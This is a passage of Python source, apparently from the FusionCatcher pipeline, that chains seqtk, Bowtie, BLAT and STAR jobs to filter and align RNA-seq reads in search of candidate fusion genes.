job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',input_file,kind='input',temp_path=temp_flag) job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') job.add('--output','-',kind='parameter',checksum='no') elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',input_file,kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') #job.add('-q','0',kind='parameter') job.add('-B',options.trim_psl_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_for-trimming.fq'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_not-for-trimming.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_for-trimming.fq'),kind='input',temp_path=temp_flag) job.add('>',output_file,kind='output') job.run() else: job.link(input_file, output_file, temp_path=temp_flag) if min_len_reads >= 47 and not options.skip_prefiltering_psl: # pre-filter the reads for BLAT because BLAT is slow # test to see if there are parts of the reads which can be mapped on gene-gene.fa using Bowtie which is faster # if yes then pass them to BLAT piece = 23 # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_2.fq'),kind='output') # job.add('--trim_end','3',kind='parameter') # job.add('--final_size',piece,kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') #job.add('-q','0',kind='parameter') job.add('-B',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_2.fq'),kind='output') job.run() # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_3.fq'),kind='output') # job.add('--trim_end','5',kind='parameter') # job.add('--final_size',piece,kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') #job.add('-q','0',kind='parameter') job.add('-E',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_3.fq'),kind='output') job.run() # group reads which mapped partially #job.add('concatenate.py',kind='program') job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_3.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.fq'),kind='output') job.run() if min_len_reads >= 59: # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='output') # job.add('--trim_end','5',kind='parameter') # job.add('--trim_size','7',kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-b','7',kind='parameter') job.add('-B',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') #job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='output') #job.run() # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_5.fq'),kind='output') # job.add('--trim_end','3',kind='parameter') # job.add('--final_size',piece,kind='parameter') # job.run() #job.add('seqtk',kind='program') #job.add('|',kind='parameter') #job.add('seqtk',kind='parameter') #job.add('trimfq',kind='parameter') #job.add('-q','0',kind='parameter') #job.add('-B',piece,kind='parameter') #job.add('-',piece,kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_5.fq'),kind='output') job.run() # job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-e','7',kind='parameter') job.add('-E',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') #job.add('|',kind='parameter') #job.add('seqtk',kind='parameter') #job.add('trimfq',kind='parameter') #job.add('-E',piece,kind='parameter') #job.add('-',piece,kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_6.fq'),kind='output') job.run() # group reads which mapped partially #job.add('concatenate.py',kind='program') job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_5.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_6.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'), temp_path=temp_flag) # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',piece,kind='parameter') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='output') job.run() if nucleotides_ggu > options.limit_bowtie: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('gene-gene_unique__nuc.txt'),kind='input') job.add('--seqs',outdir('gene-gene_unique__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie,kind='parameter') job.add('-i',outdir('gene-gene_unique.fa'),kind='input') job.add('-o',outdir('gene-gene_unique_split.fa'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_unique_split.fa'),'r').readlines()] for i,part in enumerate(parts): # build index job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',part,kind='input',temp_path=temp_flag) job.add('',part+'_dir/',kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') job.add('-v',options.mismatches,kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') if os.path.isfile(os.path.join(part+'_dir','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') job.add('',part+'_dir/',kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='output') job.add('2>',outdir('log_bowtie_psl_all.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map.')+str(i),kind='output',dest_list='genegeneunique') job.run() job.clean(outdir('log_bowtie_psl_all.txt'),temp_path=temp_flag) job.sink(job.genegeneunique, outdir('genegeneunique.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('genegeneunique.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='output') job.run() # for ft in job.genegeneunique: # job.clean(ft,temp_path=temp_flag) job.clean(job.genegeneunique,temp_path=temp_flag) else: # build index job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('gene-gene_index/'),kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') job.add('-v',options.mismatches,kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') if os.path.isfile(outdir('gene-gene_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') job.add('',outdir('gene-gene_index/'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='output') job.add('2>',outdir('log_bowtie_psl_all.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='output') job.run() job.clean(outdir('log_bowtie_psl_all.txt'),temp_path=temp_flag) # here I could remove the reads which have pieces mapping very closely to each other (all pieces [more than two] of a read map inside a gene => remove the read) # extract the short reads which mapped on gene-gene with Bowtie # job.add('extract_short_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input',temp_path=temp_flag) # job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_gene-gene.fq'),kind='output') # job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') # job.run(error_message = ("If this fails due to a memory error then lowering the "+ # "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ # "of FusionCatcher and running it again might help!")) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='input') job.add('--output','-',kind='parameter',checksum='no') job.add('>',outdir('reads_gene-gene.fq'),kind='output') job.run() else: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='input') # job.add('|',kind='parameter') # job.add('seqtk',kind='parameter') # convert it to SANGER Qualities scores # job.add('seq',kind='parameter') # job.add('-Q64',kind='parameter') # job.add('-V',kind='parameter') # job.add('-',kind='parameter') job.add('>',outdir('reads_gene-gene.fq'),kind='output') job.run() job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),temp_path=temp_flag) job.add('printf',kind='program') job.add(('"\nReads Counts after BLAT/STAR/BOWTIE2 prefiltering (and before alignment):\n'+ '--------------------------------------------------------------------------------\n"'),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_gene-gene.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() else: # link job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'), outdir('reads_gene-gene.fq'), temp_path = temp_flag) if options.filter_str: # remove STR reads job.add(_FC_+'remove_str.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--threshold',options.filter_str,kind='parameter',checksum='no') job.add('--input',outdir('reads_gene-gene.fq'),kind='input',temp_path = temp_flag) job.add('--output',outdir('reads_gene-gene_no-str.fq'),kind='output') #job.add('--str',outdir('reads_gene-gene_str.fq'),kind='output',temp_path = temp_flag) job.add('--log',outdir('log_reads_gene-gene_no-str.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('log_reads_gene-gene_no-str.txt'),kind='input',temp_path = temp_flag) job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.link(outdir('reads_gene-gene.fq'), outdir('reads_gene-gene_no-str.fq'), temp_path = temp_flag) if options.skip_fastqtk: job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('--output',outdir('log_lengths_reads_gene-gene_no-str.txt'),kind='output') job.add('--counts',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('count-lengths',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='output') job.add('',outdir('log_lengths_reads_gene-gene_no-str.txt'),kind='output') job.run() # save lengths reads info(job, fromfile = outdir('log_lengths_reads_gene-gene_no-str.txt'), tofile = info_file, top = ["Lengths of all reads before BLAT/STAR/BOWTIE2 alignment", "-----------------------------------------------------------"], bottom = "\n\n\n") # save lengths reads info(job, fromfile = outdir('log_counts_reads_gene-gene_no-str.txt'), tofile = info_file, top = ["Count of all reads before BLAT/STAR/BOWTIE2 alignment", "---------------------------------------------------------"], bottom = "\n\n\n") if job.iff(empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-1#"): t = ["="*80, "WARNING: No candidate fusion genes have been found (no unmapped reads left after filtering)!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) ################################################################################ # BLAT alignment ################################################################################ if (not options.skip_blat) and job.iff(not empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-2#"): # convert FASTQ to FASTA # job.add('fastq2fasta.py',kind='program') # job.add('--input',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path = temp_flag if options.skip_star and options.skip_bowtie2 else 'no') # job.add('--output',outdir('reads_gene-gene.fa'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-A',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path = temp_flag if options.skip_star and options.skip_bowtie2 else 'no') job.add('>',outdir('reads_gene-gene.fa'),kind='output') job.run() # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY (before using BLAT):\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() if nucleotides_gg > options.limit_blat: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('gene-gene__nuc.txt'),kind='input') job.add('--seqs',outdir('gene-gene__seq.txt'),kind='input') job.add('--threshold',options.limit_blat,kind='parameter') job.add('-i',outdir('gene-gene.fa'),kind='input') job.add('-o',outdir('gene-gene_split_blat.fa'),kind='output') job.add('-x',outdir('gene-gene_split_blat.len'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_split_blat.fa'),'r').readlines()] maxlens = [el.strip() for el in file(outdir('gene-gene_split_blat.len'),'r').readlines()] for i,part in enumerate(parts): # file size # job.add('du',kind='program') # job.add('-b',part,kind='input') # job.add('|',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',part+'.len',kind='output') # job.run() # convert fasta to 2bit job.add(_FT_+'faToTwoBit',kind='program') job.add('',part,kind='input',temp_path=temp_flag) job.add('',part+'.2bit',kind='output') job.add('-noMask',kind='parameter') job.run() job.add(_FC_+'blat_parallel.py',kind='program') job.add('-noHead',kind='parameter') job.add('-stepSize=','5',kind='parameter',space='no') # 5 job.add('-tileSize=','11',kind='parameter',space='no') # 11 job.add('-minScore=','30',kind='parameter',space='no') # 30 job.add('-t=','DNA',kind='parameter',space='no') job.add('-q=','RNA',kind='parameter',space='no') # orginall was DNA #job.add('-fine',kind='parameter') #job.add('-repMatch=','1000000',kind='parameter',space='no') # 2253 or 1000000? job.add('-repMatch=','2253',kind='parameter',space='no') # 2253 or 1000000? job.add('-minIdentity=','30',kind='parameter',space='no') # 0 job.add('-maxIntron=',maxlens[i],kind='parameter',space='no',from_file = 'yes') # default is 750000 #job.add('-maxIntron=',outdir('gene-gene_longest.txt'),kind='parameter',space='no',from_file = 'yes') # default is 750000 #job.add('-maxIntron=',part+'.len',kind='parameter',space='no',from_file = 'yes',temp_path=temp_flag) # default is 750000 job.add('--tmp_dir=',tmp_dir,kind='parameter',checksum='no',space='no') if _BT_: job.add('--blat_dir=',_BT_,kind='parameter',checksum='no',space='no') job.add('--cpus=',options.processes,kind='parameter',checksum='no',space='no') # it takes 5 GB per cpu so for here it means 12 * 5 = 60GB job.add('--filter-fusion',kind='parameter',checksum='no') # WARNING: this does a very fast pre-filtering as done in "find_fusion_genes_blat.py"; THIS should be kep in sync with "find_fusion_genes_blat.py" job.add('',part+'.2bit',kind='input',temp_path=temp_flag) job.add('',outdir('reads_gene-gene.fa'),kind='input') job.add('',outdir('reads_blat_mapped_on_fusion_genes.psl.')+str(i),kind='output',dest_list='genegeneblat') job.run() #job.clean(outdir('gene-gene_split_blat.fa'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene.fa'),temp_path=temp_flag) job.sink(job.genegeneblat, outdir('reads_blat_mapped_on_fusion_genes.psl.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('reads_blat_mapped_on_fusion_genes.psl.txt'),kind='input',temp_path=temp_flag) #job.add_list('',job.genegene,kind='input',temp_path=temp_flag,command_line='no') job.add('',outdir('reads_blat_mapped_on_fusion_genes.psl'),kind='output') job.run() # for tfile in job.genegeneblat: # job.clean(tfile,temp_path=temp_flag) job.clean(job.genegeneblat,temp_path=temp_flag) else: # no splitting of BLAT reference sequences # convert fasta to 2bit job.add(_FT_+'faToTwoBit',kind='program') job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene.2bit'),kind='output') job.add('-noMask',kind='parameter') job.run() # align the unmapped reads using BLAT on candidate fusion gene-gene # # web version of blat # blat -stepSize=5 -repMatch=2253 -minScore=0 -minIdentity=0 database.2bit query.fa output.psl # from: http://http://genome.ucsc.edu/FAQ/FAQblat.html # # other idea: ./blat -minIdentity=95 –fine -stepSize=1 –tileSize=6 -repMatch = 1000000 # from http://www.gene2drug.com/product/?p=671 by Sucheta Tripathy job.add(_FC_+'blat_parallel.py',kind='program') job.add('-noHead',kind='parameter') job.add('-stepSize=','5',kind='parameter',space='no') # 5 job.add('-tileSize=','11',kind='parameter',space='no') # 11 job.add('-minScore=','30',kind='parameter',space='no') # 30 job.add('-t=','DNA',kind='parameter',space='no') job.add('-q=','RNA',kind='parameter',space='no') # orginall was DNA #job.add('-fine',kind='parameter') #job.add('-repMatch=','1000000',kind='parameter',space='no') # 2253 or 1000000? job.add('-repMatch=','2253',kind='parameter',space='no') # 2253 or 1000000? job.add('-minIdentity=','30',kind='parameter',space='no') # 0 job.add('-maxIntron=',outdir('gene-gene_longest.txt'),kind='parameter',space='no',from_file = 'yes') # default is 750000 job.add('--tmp_dir=',tmp_dir,kind='parameter',checksum='no',space='no') job.add('--cpus=',options.processes,kind='parameter',checksum='no',space='no') # it takes 5 GB per cpu so for here it means 12 * 5 = 60GB job.add('--filter-fusion',kind='parameter',checksum='no') # WARNING: this does a very fast pre-filtering as done in "find_fusion_genes_blat.py"; THIS should be kep in sync with "find_fusion_genes_blat.py" job.add('',outdir('gene-gene.2bit'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_gene-gene.fa'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_blat_mapped_on_fusion_genes.psl'),kind='output') job.run() # find the best unique alignments of reads job.add(_FC_+'psl_best_unique_contigs.py',kind='program') job.add('--input',outdir('reads_blat_mapped_on_fusion_genes.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_best_unique_blat_mapped_on_fusion_genes.psl'),kind='output') # if (not empty(outdir('candidate_fusion-genes_further_mark.txt'))) and (not empty(datadir('custom_genes.txt'))): # job.add('--ties',datadir('custom_genes_mark.txt'),kind='input') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input') job.add('--anchor',length_anchor_blat,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough! job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='output',checksum='no') job.run() # more filtering -- remove the reads from the gene-gene junctions # which have the pair read mapping on a totally different gene than # those involved in the gene-gene junction if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program') job.add('--input_psl',outdir('reads_best_unique_blat_mapped_on_fusion_genes.psl'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 else 'no') job.add('--output_psl',outdir('reads_best_unique_blat_mapped_on_fusion_genes_pairs.psl'),kind='output') job.run() else: job.link(outdir('reads_best_unique_blat_mapped_on_fusion_genes.psl'), outdir('reads_best_unique_blat_mapped_on_fusion_genes_pairs.psl'), temp_path=temp_flag) job.add(_FC_+'find_fusion_genes_psl.py',kind='program') job.add('--input_mappings',outdir('reads_best_unique_blat_mapped_on_fusion_genes_pairs.psl'),kind='input',temp_path=temp_flag) job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 else 'no') job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',length_anchor_blat,kind='parameter') job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_blat7.txt'),kind='output') job.run() job.add(_FC_+'smoothing_fusions_psl.py',kind='program') job.add('--input',outdir('candidates_fusion_genes_reads_blat7.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidates_fusion_genes_reads_blat.txt'),kind='output') job.add('--wiggle','3',kind='parameter') job.run() # summary the gene-gene mappings job.add(_FC_+'build_report_fusions_psl.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_blat,kind='parameter') job.add('--anchor2',length_anchor2,kind='parameter') job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 and options.skip_spotlight else 'no') job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 and options.skip_spotlight else 'no') job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_blat.txt'),kind='input',temp_path=temp_flag) job.add('--input_unmapped_reads',outdir('reads_ids_unmapped.txt'),kind='input') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BLAT.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BLAT.zip'),kind='output') job.run() ################################################################################ # STAR alignment ################################################################################ if (not options.skip_star) and job.iff(not empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-3#"): # STAR is removing the /1 and /2 from the end of the reads names # changing "/1" and "/2" into "-1" "-2" such that STAR does not remove them job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\/\([1-2]$\)/\-\\1/;n;n;n'""",outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('>',outdir('reads_gene-gene_no-str_fixed.fq'),kind='output') job.run() if os.path.exists(outdir('log_lengths_reads_gene-gene_no-str.txt')): sdjboverhang = int(float(file(outdir('log_lengths_reads_gene-gene_no-str.txt'),'r').readline().strip())) - 1 file(outdir('star_sdjboverhang.txt'),'w').write("%d" % (sdjboverhang,)) genomesaindexnbases = int(min(14, math.log(nucleotides_gg,2)/(float(2)) - 1)) genomechrbinnbits = int(min(18, math.log(float(nucleotides_gg)/float(sequences_gg),2))) # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY (before using STAR):\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() if nucleotides_gg > options.limit_star: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('gene-gene__nuc.txt'),kind='input') job.add('--seqs',outdir('gene-gene__seq.txt'),kind='input') job.add('--threshold',options.limit_star,kind='parameter') job.add('-i',outdir('gene-gene.fa'),kind='input') job.add('-o',outdir('gene-gene_split_star.fa'),kind='output') job.add('-x',outdir('gene-gene_split_star.len'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_split_star.fa'),'r').readlines()] maxlens = [el.strip() for el in file(outdir('gene-gene_split_star.len'),'r').readlines()] for i,part in enumerate(parts): # get the length of the FASTA file # job.add('du',kind='program') # job.add('-b',part,kind='input') # job.add('|',kind='parameter') # 